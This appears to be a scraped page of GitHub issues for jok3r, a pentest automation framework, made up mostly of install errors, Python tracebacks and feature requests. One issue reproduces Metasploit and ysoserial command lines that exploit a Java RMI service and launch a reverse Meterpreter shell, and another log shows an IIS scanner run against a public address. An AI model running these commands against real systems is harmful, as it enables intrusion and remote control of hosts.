koutto / jok3r Goto Github PK

At jok3r.py db start i got this:

Hi @koutto,

To say you i'm PoCing migration to archlinux/blackarch.

Should be easy to install all your tool due to the big choice in tools.
I use arch everyday so I know it.

Tell me if you see a problem about this.

To run properly the app actually needs :

Python modules

• regex
• setuptools

Linux packages :

• python-dev

Hi,
Firstly, thank you very much for your working , really it's very useful tool.

My question:
How can change my Reverse IP for exploit attacks, For.ex ;
I running the following command for a attack
python3 jok3r.py attack -m testDB -f "service=java-rmi" --fast

I see in the screen my reverse IP such as LHOST 127.0.0.1, I think So, this exploit could not doing connection.

_cmd> sudo msfconsole -q -x "use exploit/multi/misc/java_rmi_server; set RHOST 192.168.183.11; set RPORT 5001; set VERBOSE true; set LPORT 8443; set SRVPORT 9080; ; set PAYLOAD java/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 8443; set AutoRunScript multi_console_command -c getuid,ps,exit; exploit; sleep 2; exit"

cmd> ./run-ysoserial.sh ysoserial.exploit.RMIRegistryExploit 192.168.183.11 5001 Myfaces1 127.0.0.1_

How can do my eth0 interface IP to replacement as LHOST IP?

I want to delete target from DB, how to do that?

And hope tools for SQLi,LFI,RFI,RCE added soon like SqlMap

OS: MacOS Monterey 12.1
Chip: M1

[*] URL given as target, targeted service is HTTP
[*] Check if service is reachable...
[*] Grab service info for [host 193.29.204.164 | port 443/tcp | service http] via Nmap...
Nmap scan failed: pcap_open_live(eth0, 256, 0, 200) FAILED. Reported error: eth0: SIOCETHTOOL(ETHTOOL_GET_TS_INFO) ioctl failed: Function not implemented.  Will wait 5 seconds then retry.
pcap_open_live(eth0, 256, 0, 200) FAILED. Reported error: eth0: SIOCETHTOOL(ETHTOOL_GET_TS_INFO) ioctl failed: Function not implemented.  Will wait 25 seconds then retry.
Call to pcap_open_live() failed three times. There are several possible reasons for this, depending on your operating system:
LINUX: If you are getting Socket type not supported, try modprobe af_packet or recompile your kernel with PACKET enabled.
 *BSD:  If you are getting device not configured, you need to recompile your kernel with Berkeley Packet Filter support.  If you are getting No such file or directory, try creating the device (eg cd /dev; MAKEDEV <device>; or use mknod).
*WINDOWS:  Nmap only supports ethernet interfaces on Windows for most operations because Microsoft disabled raw sockets as of Windows XP SP2.  Depending on the reason for this error, it is possible that the --unprivileged command-line argument will help.
SOLARIS:  If you are trying to scan localhost or the address of an interface and are getting '/dev/lo0: No such file or directory' or 'lo0: No DLPI device found', complain to Sun.  I don't think Solaris can support advanced localhost scans.  You can probably use "-Pn -sT localhost" though.


QUITTING!

[!] Unexpected error occured: 'NoneType' object is not subscriptable
Traceback (most recent call last):
  File "jok3r.py", line 44, in __init__
    controller.run()
  File "/root/jok3r/lib/controller/MainController.py", line 23, in run
    }.get(self.arguments.mode)(self.arguments, self.settings, self.sqlsess).run()
  File "/root/jok3r/lib/controller/AttackController.py", line 86, in run
    self.__run_for_single_target(args)
  File "/root/jok3r/lib/controller/AttackController.py", line 141, in __run_for_single_target
    or args.nmap_banner_grab == 'on'))
  File "/root/jok3r/lib/core/Target.py", line 352, in smart_check
    self.service.banner = NetUtils.clean_nmap_banner(nmap_info['banner'])
TypeError: 'NoneType' object is not subscriptable
root@jok3r-docker:~/jok3r#

Hello there .How can i update api keys for vulners censys shodan etc .Thanks

Hey @koutto ,

Are you ok to come on IRC irc.freenode.net #jok3r?

Regards

jok3r-pocs would not install through the install script. So, I manually git cloned it in jok3r/toolbox/multi and installed it. I run update.sh to check. It shows that jok3r-pocs is not installed. What am I doing wrong?

I am getting this while i try to run jok3r

While running the command command "python3 jok3r.py attack -t http://targetwebsite.com/ --add2db test " from the docker, Following python error appears. It seems like the "sys" module is not being imported.

[*] URL given as target, targeted service is HTTP
[!] Unable to resolve scanme.nmap.org
[!] Unexpected error occured: name 'sys' is not defined
Traceback (most recent call last):
File "/root/jok3r/lib/controller/AttackController.py", line 130, in __run_for_single_target
target = Target(service, self.settings.services)
File "/root/jok3r/lib/core/Target.py", line 45, in init
self.__init_with_url()
File "/root/jok3r/lib/core/Target.py", line 68, in __init_with_url
raise TargetException('Unable to resolve {}'.format(url.hostname))
lib.core.Exceptions.TargetException: Unable to resolve scanme.nmap.org

During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "jok3r.py", line 44, in init
controller.run()
File "/root/jok3r/lib/controller/MainController.py", line 23, in run
}.get(self.arguments.mode)(self.arguments, self.settings, self.sqlsess).run()
File "/root/jok3r/lib/controller/AttackController.py", line 86, in run
self.__run_for_single_target(args)
File "/root/jok3r/lib/controller/AttackController.py", line 133, in __run_for_single_target
sys.exit(1)
NameError: name 'sys' is not defined

maybe problem in:
lib/controller/DbController.py: line 1711

`action = 'store_true' ?

Docker Container on MacOS Big Sur:

jok3rdb[default]> nmap nmapResults.xml

[*] Importing Nmap results from nmapResults.xml
[*] Each service will be re-checked to detect HTTP services. Use --no-http-recheck if you want to disable it (faster import)
EXCEPTION of type 'IndexError' occurred with message: 'list index out of range'
To enable full traceback, run the following command:  'set debug true'

.

koutto/cvedetails-lookup#1

After running python3 jok3r.py toolbox --update-all --fast , jok3r.py doesn't run anymore with following error:

root@jok3r-docker:~/jok3r# python3 jok3r.py db

[!] Unexpected error occured: do_load
Traceback (most recent call last):
File "jok3r.py", line 44, in init
controller.run()
File "/root/jok3r/lib/controller/MainController.py", line 18, in run
{
File "/root/jok3r/lib/controller/DbController.py", line 65, in init
del cmd2.Cmd.do_load
AttributeError: do_load

Version of cmd2:

root@jok3r-docker:~/jok3r# pip3 show cmd2
Name: cmd2
Version: 1.0.2

...
[*] Check if service is reachable...
[*] A matching service has been found in the database
[+] Updated: host ***.***.***.*** | port 21/tcp | service ftp
[+] Target reachable: host ***.***.***.*** | port 21/tcp | service ftp
[*] Products detected for this target:
+------------+--------+---------+
| Type       | Name   | Version |
+------------+--------+---------+
| ftp-server | Vsftpd | 2.3.4   |
+------------+--------+---------+
[*] [SMART] SmartStart processing to initialize context...
[*] [SMART] Product detected from banner: ftp-server = Vsftpd 2.3.4
[*] [SMART] Product detected: ftp-server=Vsftpd 2.3.4. Not updated because already in db
[!] Unexpected error occured: 'str' object has no attribute 'is_service_supported'
Traceback (most recent call last):
  File "jok3r.py", line 44, in __init__
    controller.run()
  File "/root/jok3r/lib/controller/MainController.py", line 23, in run
    }.get(self.arguments.mode)(self.arguments, self.settings, self.sqlsess).run()
  File "/root/jok3r/lib/controller/AttackController.py", line 88, in run
    self.__run_for_multi_targets(args)
  File "/root/jok3r/lib/controller/AttackController.py", line 224, in __run_for_multi_targets
    self.attack_scope.attack()
  File "/root/jok3r/lib/core/AttackScope.py", line 163, in attack
    self.__attack_target(target, attack_progress)
  File "/root/jok3r/lib/core/AttackScope.py", line 199, in __attack_target
    attack_progress=attack_progress)
  File "/root/jok3r/lib/core/ServiceChecks.py", line 150, in run
    attack_progress)
  File "/root/jok3r/lib/core/ServiceChecks.py", line 325, in __run_special_mode
    if not attack_profile.is_service_supported(target.get_service_name()):
AttributeError: 'str' object has no attribute 'is_service_supported'

Your docker image is used. So my steps to reproduce the issue:

1. Run the command from your simple examples:
   python3 jok3r.py attack -m <mission_name> --profile <some_profile_name> --fast
2. Profit.

Hello,

I'm looking into the possibility to share database data/missions among other team members, since jok3r is using sqlite there is not too much we can do, for that reason I am trying to share local.db using a docker volume within a bucket in Google Cloud Storage (https://www.youtube.com/watch?v=4Z4mQqQ92tc), theorically, sharing a volume with the db location of one jok3r instance, and enabling WAL mode for the sqlite connections, it should allow to work with multiples jok3r container instances pointing to the same db.

I am not an expert programming in python but as far as I know the way it can be done either:

pragmas = [ ('journal_mode', 'wal'), ('cache_size', -1000 * 32)] db = SqliteExtDatabase('blog.db', pragmas=pragmas)

OR
db:sqlite:foo.db?foreign_keys=ON;journal_mode=WAL

OR
conn.execute('pragma journal_mode=wal')

I didn't find any place where to set and test it, has anyone try it before?

I'm exploring the possibility of integrating authentication credentials or an API token to run vulnerability scans across an entire web application. Is there a recommended method or existing functionality that allows for providing login credentials or an API token to initiate these scans? Any guidance or suggestions on how to enable authentication for conducting comprehensive vulnerability assessments would be greatly appreciated. Thank you!

Is there a way to accept all. Currently you have to agree to all individually. Defeats automation.

Hi @koutto,

I want to share with you a cool tool which can maybe help you to monitor the stuff you put in this project, in case you don't know it: https://github.com/thp/urlwatch
Sorry for the noise if this not interest you.

Enlighten version 1.2.0 introduced an offset argument. You should be able to pass that to enlighten.Manager to get the same effect as your workaround. Something like this.

manager = enlighten.get_manager(offset=24)

That should reduce lib.output.StatusBar down to about 3 lines which you could just move to lib.output.Output

postexploit > wordpress-shell-upload hangs indefinitely when scanning. Not running wordpress at all so I can just skip but just giving a heads up

I went through the documentation and saw that the tool supports scans for https sites. In case of sites which require authentication, how would you use it? Is authenticated scans supported?

Hello,
I encountered an issue when my ip address is like 192.168.100.100 and my port is above 99, if my port is under or equals any problem and it woks also when my IP address is under 100 like 192.168.100.99 and my port is above 99.
I think this problem is localised in the argparse module of Jok3r.
Thank you in advance

Hi @koutto,

Thanks a lot for the project.

ExploitDB seems to have rename files.csv to files_exploits.csv here https://github.com/offensive-security/exploitdb/blob/master/files_exploits.csv

I just open a PR for https://github.com/ovpn-to/ftpmap but lot of tools are so broken.

I think you should manage this one so to not depends from others projects so, until other projects are updated.

Also, if you want to delegate some thing or need help, purpose some tasks, i can try to contrib ;)

Thanks yet,
Regards!

@koutto,

What about use https://github.com/michenriksen/aquatone (packaged in archlinux) for take screenshot instead of firefox which pull lot of dependency for archlinux/kali?

Can you take this point?

Regards

OS: Kali Linux
Ran the jok3r update script on 7-10-19. All tools updated successfully.

After creating a new mission, I attempted to import the saved nmap xml file as I have done in the past and receive the following error:

jok3rdb[netgear]> nmap '/root/jok3r/netgear.xml' 

[*] Importing Nmap results from /root/jok3r/netgear.xml
[*] Each service will be re-checked to detect HTTP services. Use --no-http-recheck if you want to disable it (faster import)

EXCEPTION of type 'IndexError' occurred with message: 'list index out of range'
To enable full traceback, run the following command:  'set debug true'

It would be useful to be able to import nmap xml files from a directory for instance

root@DESKTOP-DDJ9GB4:/home/pedro/jok3r# python3 jok3r.py
Traceback (most recent call last):
File "jok3r.py", line 13, in
from lib.controller.MainController import MainController
File "/home/pedro/jok3r/lib/controller/init.py", line 6, in
from .DbController import *
File "/home/pedro/jok3r/lib/controller/DbController.py", line 8, in
import cmd2
File "/usr/local/lib/python3.7/dist-packages/cmd2/init.py", line 13, in
from .cmd2 import Cmd, Statement, EmptyStatement, categorize
File "/usr/local/lib/python3.7/dist-packages/cmd2/cmd2.py", line 50, in
from .clipboard import can_clip, get_paste_buffer, write_to_paste_buffer
File "/usr/local/lib/python3.7/dist-packages/cmd2/clipboard.py", line 28, in
_ = pyperclip.paste()
File "/usr/local/lib/python3.7/dist-packages/pyperclip/init.py", line 638, in lazy_load_stub_paste
return paste()
File "/usr/local/lib/python3.7/dist-packages/pyperclip/init.py", line 479, in paste_wsl
close_fds=True)
File "/usr/lib/python3.7/subprocess.py", line 775, in init
restore_signals, start_new_session)
File "/usr/lib/python3.7/subprocess.py", line 1522, in _execute_child
raise child_exception_type(errno_num, err_msg, err_filename)
FileNotFoundError: [Errno 2] No such file or directory: 'powershell.exe': 'powershell.exe'

Ok Kali Linux fully Updated under Windows 10 (with powershell installed)

Any help?

Hello! I use jok3r in Docker. When I start checking (I tried http and mysql), for example:

python3 jok3r.py db
mission -a sp
CTRL+d
python3 jok3r.py attack -t https://site.ru --add sp

I always got the error:

[*] Results from this attack will be saved under mission "sp" in database
[!] Unexpected error occured: (sqlite3.OperationalError) no such column: services.html_title
[SQL: SELECT services.id AS services_id, services.name AS services_name, services.port AS services_port, services.protocol AS services_protocol, services.url AS services_url, services.up AS services_up, services.banner AS services_banner, services.html_title AS services_html_title, services.http_headers AS services_http_headers, services.web_technos AS services_web_technos, services.comment AS services_comment, services.host_id AS services_host_id 
FROM services JOIN hosts ON hosts.id = services.host_id JOIN missions ON missions.id = hosts.mission_id 
WHERE hosts.ip = ? AND missions.name = ? AND services.name = ? AND services.port = ? AND services.protocol = ? AND services.url = ?
 LIMIT ? OFFSET ?]
[parameters: (1475088592, 'sp', 'http', 443, 'TCP', 'https://site.ru', 1, 0)]
(Background on this error at: http://sqlalche.me/e/e3q8)
Traceback (most recent call last):
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/engine/base.py", line 1244, in _execute_context
    cursor, statement, parameters, context
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/engine/default.py", line 552, in do_execute
    cursor.execute(statement, parameters)
sqlite3.OperationalError: no such column: services.html_title

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "jok3r.py", line 44, in __init__
    controller.run()
  File "/root/jok3r/lib/controller/MainController.py", line 23, in run
    }.get(self.arguments.mode)(self.arguments, self.settings, self.sqlsess).run()
  File "/root/jok3r/lib/controller/AttackController.py", line 86, in run
    self.__run_for_single_target(args)
  File "/root/jok3r/lib/controller/AttackController.py", line 164, in __run_for_single_target
    req.add_target(target)
  File "/root/jok3r/lib/requester/ServicesRequester.py", line 272, in add_target
    .filter(Service.url == target.get_url()).first()
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/orm/query.py", line 3215, in first
    ret = list(self[0:1])
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/orm/query.py", line 3007, in __getitem__
    return list(res)
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/orm/query.py", line 3317, in __iter__
    return self._execute_and_instances(context)
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/orm/query.py", line 3342, in _execute_and_instances
    result = conn.execute(querycontext.statement, self._params)
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/engine/base.py", line 988, in execute
    return meth(self, multiparams, params)
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/sql/elements.py", line 287, in _execute_on_connection
    return connection._execute_clauseelement(self, multiparams, params)
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/engine/base.py", line 1107, in _execute_clauseelement
    distilled_params,
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/engine/base.py", line 1248, in _execute_context
    e, statement, parameters, cursor, context
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/engine/base.py", line 1466, in _handle_dbapi_exception
    util.raise_from_cause(sqlalchemy_exception, exc_info)
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/util/compat.py", line 383, in raise_from_cause
    reraise(type(exception), exception, tb=exc_tb, cause=cause)
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/util/compat.py", line 128, in reraise
    raise value.with_traceback(tb)
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/engine/base.py", line 1244, in _execute_context
    cursor, statement, parameters, context
  File "/usr/local/lib/python3.7/dist-packages/sqlalchemy/engine/default.py", line 552, in do_execute
    cursor.execute(statement, parameters)
sqlalchemy.exc.OperationalError: (sqlite3.OperationalError) no such column: services.html_title
[SQL: SELECT services.id AS services_id, services.name AS services_name, services.port AS services_port, services.protocol AS services_protocol, services.url AS services_url, services.up AS services_up, services.banner AS services_banner, services.html_title AS services_html_title, services.http_headers AS services_http_headers, services.web_technos AS services_web_technos, services.comment AS services_comment, services.host_id AS services_host_id 
FROM services JOIN hosts ON hosts.id = services.host_id JOIN missions ON missions.id = hosts.mission_id 
WHERE hosts.ip = ? AND missions.name = ? AND services.name = ? AND services.port = ? AND services.protocol = ? AND services.url = ?
 LIMIT ? OFFSET ?]
[parameters: (1475088592, 'sp', 'http', 443, 'TCP', 'https://site.ru', 1, 0)]
(Background on this error at: http://sqlalche.me/e/e3q8)

In some cases, when using 'report' command inside jok3r framework, I get the following error:

[] Taking web page screenshots for HTTP services (total: 1)...
[] [1/1] Screenshot already in database for https://
Traceback (most recent call last):
File "/home/XXXXXXXX/.local/lib/python3.8/site-packages/cmd2/cmd2.py", line 1646, in onecmd_plus_hooks
stop = self.onecmd(statement, add_to_history=add_to_history)
File "/home/XXXXXXXX/.local/lib/python3.8/site-packages/cmd2/cmd2.py", line 2075, in onecmd
stop = func(statement)
File "/home/XXXXXXXX/.local/lib/python3.8/site-packages/cmd2/decorators.py", line 270, in cmd_wrapper
return func(cmd2_app, args, **kwargs)
File "/home/XXXXXXXX//jok3r/lib/controller/DbController.py", line 1737, in do_report
reporter.run()
File "/home/XXXXXXXX/jok3r/lib/reporter/Reporter.py", line 101, in run
html = self.__generate_index()
File "/home/XXXXXXXX/jok3r/lib/reporter/Reporter.py", line 147, in __generate_index
tpl = FileUtils.read(REPORT_TPL_DIR + '/index.tpl.html')
File "/home/XXXXXXXX/jok3r/lib/utils/FileUtils.py", line 41, in read
result += line
TypeError: can only concatenate str (not "bytes") to str
EXCEPTION of type 'TypeError' occurred with message: 'can only concatenate str (not "bytes") to str'

The create database command python3 jok3r.py db gives the following error
Traceback (most recent call last):

File "jok3r.py", line 44, in init
controller.run()
File "/root/jok3r/lib/controller/MainController.py", line 23, in run
}.get(self.arguments.mode)(self.arguments, self.settings, self.sqlsess).run()
File "/root/jok3r/lib/controller/DbController.py", line 68, in init
del cmd2.Cmd.do_load
AttributeError: do_load

Hey @koutto,
I see you allready use rvm for whatweb, we should use python/ruby virtualenv for each non packaged tools.
I broke my metasploit due to a nokigiri conflict for example.
In the tools install worflow I think we should try to detect the language and force a virtualenv creation.
Or simply do this manually in the install/update/exec config part of each tools.
What do you think about this?
About ruby maybe think to use rvm gemset to be lighter.

Do you think it can be usefull to do the recon with shodan? In fast mode this will do noise directly so useless but if in interactive before going further this can help?

• need an api key
  https://nmap.org/nsedoc/scripts/shodan-api.html

The problem I had was on line 116: Unexpected error occured: name 'sys' is not defined.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
###
### Core > Attack Controller
###
import datetime

from humanfriendly import format_timespan
from lib.controller.Controller import Controller
from lib.core.AttackScope import AttackScope
from lib.core.Constants import *
from lib.core.Exceptions import AttackException, TargetException
from lib.core.Target import Target
from lib.db.Credential import Credential
from lib.db.Host import Host
from lib.db.Mission import Mission
from lib.db.Option import Option
from lib.db.Service import Protocol, Service
from lib.output.Logger import logger
from lib.requester.ServicesRequester import ServicesRequester


class AttackController(Controller):

    def run(self):
        """Run the Attack Controller"""

        args = self.arguments.args
        logger.debug('CLI arguments:')
        logger.debug(args)

        # Attack configuration: Categories of checks to run
        categories = self.settings.services.list_all_categories() # default: all

        if args.cat_only:
            categories = [ cat for cat in categories if cat in args.cat_only ]
        elif args.cat_exclude:
            categories = [ cat for cat in categories if cat not in args.cat_exclude ]


        # Create the attack scope
        self.attack_scope = AttackScope(
            self.settings,
            self.arguments,
            self.sqlsess,
            args.mission or args.add,
            filter_categories=categories,
            filter_checks=args.checks,
            attack_profile=args.profile,
            fast_mode=args.fast_mode)


        # Run the attack
        begin = datetime.datetime.now()
        if args.target_ip_or_url:
            self.__run_for_single_target(args)
        else:
            self.__run_for_multi_targets(args)

        print()
        duration = datetime.datetime.now() - begin
        logger.info('Finished. Duration: {}'.format(format_timespan(duration.seconds)))


    #------------------------------------------------------------------------------------
    # Single-Target mode

    def jls_extract_def(self):

        return

    def jls_extract_def(self, service):
        # Initialize Target
        try:
            target = Target(service, self.settings.services)
        except TargetException as errcode:
            logger.error(errcode)
            jls_extract_var = sys = self.jls_extract_def(service)
            jls_extract_var.exit(1)
        return target

    def __run_for_single_target(self, args):
        """Run attack against a single target specified into args"""

        req = ServicesRequester(self.sqlsess)
        mission = None

        # Get Mission if target must be added into a mission scope
        if args.add:
            mission = self.sqlsess.query(Mission).filter(Mission.name == args.add).first()
            if not mission:
                raise AttackException('The specified mission does not exist in the ' \
                    'database. You should create it if needed')

        # Create new Service/Host objects (if service already exist,
        # will be merged by ServicesRequester.add_target)
        url = args.target_ip_or_url if args.target_mode == TargetMode.URL else ''
        ip  = args.target_ip_or_url if args.target_mode == TargetMode.IP else ''
        service = Service(
            name=args.service,
            port=int(args.target_port),
            protocol=self.settings.services.get_protocol2(args.service),
            url=url)
        host = Host(ip=ip) # Will be updated when initializing Target()
        host.services.append(service)

        # Update context (credentials, options, products) if specified in command-line
        if args.creds:
            for c in args.creds[args.service]:
                self.sqlsess.add(c)
                service.credentials.append(c)
        if args.users:
            for u in args.users[args.service]:
                self.sqlsess.add(u)
                service.credentials.append(u)
        if args.products:
            for p in args.products[args.service]:
                self.sqlsess.add(p)
                service.products.append(p)
        if args.options:
            for o in args.options[args.service]:
                self.sqlsess.add(o)
                service.options.append(o)

        target = self.jls_extract_def(service)

        # Check Target and update its information:
        # - Reverse DNS lookup: by default
        # - Port check: always
        # - Nmap service detection: by default
        # - HTML title grabbing: always
        # - Web technologies detection: always
        # - Context initialization via SmartStart: always
        reachable = target.smart_check(
            reverse_dns_lookup=(args.reverse_dns is None or args.reverse_dns == 'on'),
            availability_check=True,
            nmap_banner_grabbing=(args.nmap_banner_grab is None \
                or args.nmap_banner_grab == 'on'),
            html_title_grabbing=True,
            web_technos_detection=True,
            smart_context_initialize=True)

        # Display availability status, exit if not reachable
        if args.target_mode == TargetMode.IP:
            msg = 'Target service {neg}reachable: {target}'.format(
                neg='not ' if not reachable else '',
                target=target)
        else:
            msg = 'Target URL {url} is {neg}reachable'.format(
                url=target.get_url(),
                neg='not ' if not reachable else '')

        if reachable:
            logger.success(msg)
        else:
            logger.error(msg)
            return

        # Commit the target with updated information inside the appropriate
        # mission in the database
        if mission:
            logger.info('Results from this attack will be saved under mission ' \
                '"{mission}" in database'.format(mission=mission.name))
            req.select_mission(mission.name)
            req.add_target(target)

        # Run the attack
        self.attack_scope.add_target(target)
        self.attack_scope.attack()
        return


    #------------------------------------------------------------------------------------
    # Multi-Targets mode

    def __run_for_multi_targets(self, args):
        """Run attack against multiple targets from the database"""

        # Get Mission from which targets must be extracted
        mission = self.sqlsess.query(Mission)\
                    .filter(Mission.name == args.mission).first()
        if mission:
            logger.info('Extracting targets from mission "{mission}" ...'.format(
                mission=mission.name))
        else:
            raise AttackException('Mission {mission} does not exist into the ' \
                'database'.format(mission=args.mission))

        # Initialize Services requester and add filter if provided
        req = ServicesRequester(self.sqlsess)
        req.select_mission(args.mission)

        if args.filters_combined:
            for filt in args.filter:
                logger.info('Applying filters on mission scope: {filter}'.format(
                    filter=filt))
            if len(args.filter) > 1:
                logger.info('Note: Logical OR is applied between each filter')
            req.add_filter(args.filters_combined)

        # Retrieve targeted services from database
        services = req.get_results()
        if not services:
            raise AttackException('There is no matching service to target into the ' \
                'database')

        # Add each targeted service into Attack scope
        for service in services:

            # Update credentials, options, products if specified in command-line
            if args.creds:
                for c in args.creds[service.name]:
                    service.add_credential(c.clone())
            if args.users:
                for u in args.users[service.name]:
                    service.add_credential(u.clone())
            if args.products:
                for p in args.products[service.name]:
                    service.add_product(p.clone())
            if args.options:
                for o in args.options[service.name]:
                    service.add_option(o.clone())

            # Initialize Target
            try:
                target = Target(service, self.settings.services)
            except TargetException as e:
                logger.error(e)
                continue

            self.attack_scope.add_target(target)

        # Run the attack
        self.attack_scope.attack()

I am trying to run the command below, but the Wappalyzer error and the scan appear.

python3 jok3r.py attack -t https://www.site-test.com.br/ --add SITE-TEST

And result:

`[?] Start attack ? [Y/n] Y

[*] HTTP Response headers:
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
Set-Cookie: ASP.NET_SessionId=nt0g54aegvmtpkrdwbbcl1c; path=/; HttpOnly
X-AspNetMvc-Version: 5.2
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 04 Feb 2019 23:43:19 GMT
Content-Length: 14784

[] [SMART] Running initialization method...
[] HTTPS protocol detected from URL
[*] Server detected from banner: iis
[!] Wappalyzer error: 'ascii' codec can't decode byte 0xc2 in position 86207: ordinal not in range(128)`

I get the error below when I try to run the python3 jok3r.py toolbox --update-all --auto command.

jok3r.py: error: unrecognized arguments: --auto

What I get:

File "/home/kalimatrix/jok3r/jok3r.py", line 13, in
from lib.controller.MainController import MainController
File "/home/kalimatrix/jok3r/lib/controller/init.py", line 6, in
from .DbController import *
File "/home/kalimatrix/jok3r/lib/controller/DbController.py", line 15, in
from lib.core.NmapResultsParser import NmapResultsParser
ModuleNotFoundError: No module named 'lib.core.NmapResultsParser'

What I tried:

I tried commenting out the lines, 68 and 70, in the DbController.py file, and some other lines that I saw the error with. I even had an issue with indentation, and after trying to fix it on my own, I just downloaded the raw files, and swap them in there.

Hello,
When I use the command, docker pull koutto/jok3r, I get the error below:
Error response from daemon: manifest for koutto/jok3r:latest not found

Not sure if this is an issue but I get this warning running in docker.

cmd> sudo msfconsole -q -x "use auxiliary/scanner/http/iis_internal_ip; set RHOSTS 52.201.60.171; set RHOST 52.201.60.171; set RPORT 443; set VERBOSE true; set SSL true; set VERBOSE true; run; exit"

[-] ***
[-] * WARNING: No database support: No database YAML file
[-] ***
RHOSTS => xxx.xxx.xxx.xxx
RHOST => xxx.xxx.xxx.xxx
RPORT => 443
VERBOSE => true
SSL => true
VERBOSE => true
[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed

I get an error message when I try to start a scan: "Database is locked"

I have been running multiple scans with zero issues for a while now.

One of the scans encountered the same error and I quit it. Subsequent scans have been stopping with the same error at the "check if service is reachable" point at the beginning of the scan

.

Help please.

I have attached screenshots for clarity.

root@kali:/home/kali/bug-bounty/jok3r# python3 jok3r.py db

                      `-:/++++/:-.    .-:/++++/:-`                                    
                    .:ohdddmmmmdd.\  /.dddmmmmdddho:.                                
                  `:ydmmmmmmmmmmmmm\/mmmmmmmmmmmmmmdy:`                         
                 `+dmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmd+`                     
                +dyo+++oshmmmmmmmmmmmmmmmmmmmmhso+++oyd+                    
              -+-         .dmmmmmmmmmmmmmmmmd.         -+-                  
             ``           `dmmmmmmmmmmmmmmmmd`           ``                 
                          `dmmmmmmmmmmmmmmmmd`                              
                          `ymmmmmmmmmmmmmmmmy`                              
                            .+dmmmmmmmmmmd+.                                
                               /dmmmmmmd/                                   
                                `odmmdo`                                    
                                  .hh.                                      
                                                    
                                                               
                   ██╗ ██████╗ ██╗  ██╗██████╗ ██████╗ 
                   ██║██╔═══██╗██║ ██╔╝╚════██╗██╔══██╗
                   ██║██║   ██║█████╔╝  █████╔╝██████╔╝
              ██   ██║██║   ██║██╔═██╗  ╚═══██╗██╔══██╗
              ╚█████╔╝╚██████╔╝██║  ██╗██████╔╝██║  ██║  v3.0 beta 2
               ╚════╝  ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚═╝  ╚═╝ 
              
              [ Network & Web Pentest Automation Framework ]

[!] Unexpected error occured: do_load
Traceback (most recent call last):
File "jok3r.py", line 44, in init
controller.run()
File "/home/kali/bug-bounty/jok3r/lib/controller/MainController.py", line 18, in run
{
File "/home/kali/bug-bounty/jok3r/lib/controller/DbController.py", line 68, in init
del cmd2.Cmd.do_load
AttributeError: do_load

after scanning my site with jok3r i came back next day login and try to run my docker it show me an error

sudo docker start -i jok3r-container
Error: No such container: jok3r-container

[!] Unexpected error occured: No section: 'config'
Traceback (most recent call last):
File "/jok3r/jok3r.py", line 26, in init
settings = Settings()
File "/jok3r/lib/core/Settings.py", line 156, in init
self.__create_all_services_config_and_checks()
File "/jok3r/lib/core/Settings.py", line 365, in __create_all_services_config_and_checks
self.__parse_service_checks_config_file(f)
File "/jok3r/lib/core/Settings.py", line 379, in __parse_service_checks_config_file
categories = self.__parse_section_config(service, service_config)
File "/jok3r/lib/core/Settings.py", line 421, in __parse_section_config
optparsed = self.config_parsers[service].options('config')
File "/usr/lib/python3.9/configparser.py", line 675, in options
raise NoSectionError(section) from None
configparser.NoSectionError: No section: 'config'

i got this error when i try to execute , i try to reinstall the module parser but nothing anyone had the same error ?? or how i can to fix ?? thanks